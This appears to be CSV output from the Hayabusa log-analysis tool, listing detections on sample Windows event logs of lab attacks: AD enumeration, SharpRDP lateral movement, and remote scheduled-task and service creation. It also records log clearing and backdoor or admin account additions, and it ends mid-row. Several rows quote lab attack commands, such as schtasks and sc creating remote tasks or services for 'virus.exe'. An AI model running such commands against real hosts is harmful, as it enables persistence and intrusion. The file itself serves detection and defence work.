0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:57:38.917 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 
10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.334 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.365 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.430 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.430 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.714 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.723 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | 
Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.725 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.728 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:40.825 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:57:52.909 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:11.977 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 
+2020-07-09 20:58:11.981 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.004 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.005 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 20:58:12.005 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-09 21:22:31.163 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-09 21:25:41.773 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-09 21:29:17.982 +00:00,jump01.offsec.lan,4688,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-List all Service Principal Names (SPN).evtx +2020-07-09 21:29:17.982 +00:00,jump01.offsec.lan,4688,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4688-SPN added to an account.evtx +2020-07-09 22:00:11.181 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:17.584 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:27.033 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 
747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:31.217 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:40.413 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:45.589 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:48.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:00:58.550 +00:00,MSEDGEWIN10,3,info,,Network 
Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:01:03.898 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:01:06.427 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:05:58.373 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-09 22:06:07.487 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 10:20:34.910 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 10:20:35.589 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 10:20:37.637 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 
+2020-07-10 10:20:37.637 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 17:16:42.576 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:16:42.592 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:16:50.984 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-11 17:17:49.788 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 17:17:49.788 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 17:18:01.228 +00:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-11 21:09:03.249 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx +2020-07-11 21:09:03.249 +00:00,jump01.offsec.lan,4688,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled 
Task/ID4688-Scheduled task creation.evtx +2020-07-11 21:38:17.351 +00:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: 2020-07-11T21:38:17 OFFSEC\lambda-user 2020-07-11T15:20:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\WINDOWS\Temp\MpCmdRun.bat S-1-5-18 LeastPrivilege | User: admmig | LID: 0x3246775",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-11 21:38:17.445 +00:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-11 21:38:17.445 +00:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. 
arg.).evtx +2020-07-11 21:46:39.786 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-11 21:46:39.786 +00:00,jump01.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx +2020-07-11 21:49:56.318 +00:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-11 21:50:07.213 +00:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 05:10:08.442 +00:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 05:10:08.442 
+00:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 05:12:58.295 +00:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 05:14:30.976 +00:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 05:14:30.976 +00:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 05:17:23.107 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx 
+2020-07-12 05:17:23.107 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 05:19:54.561 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.561 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.564 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.564 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 
0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.566 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.566 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.568 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.568 +00:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 05:19:54.570 +00:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global 
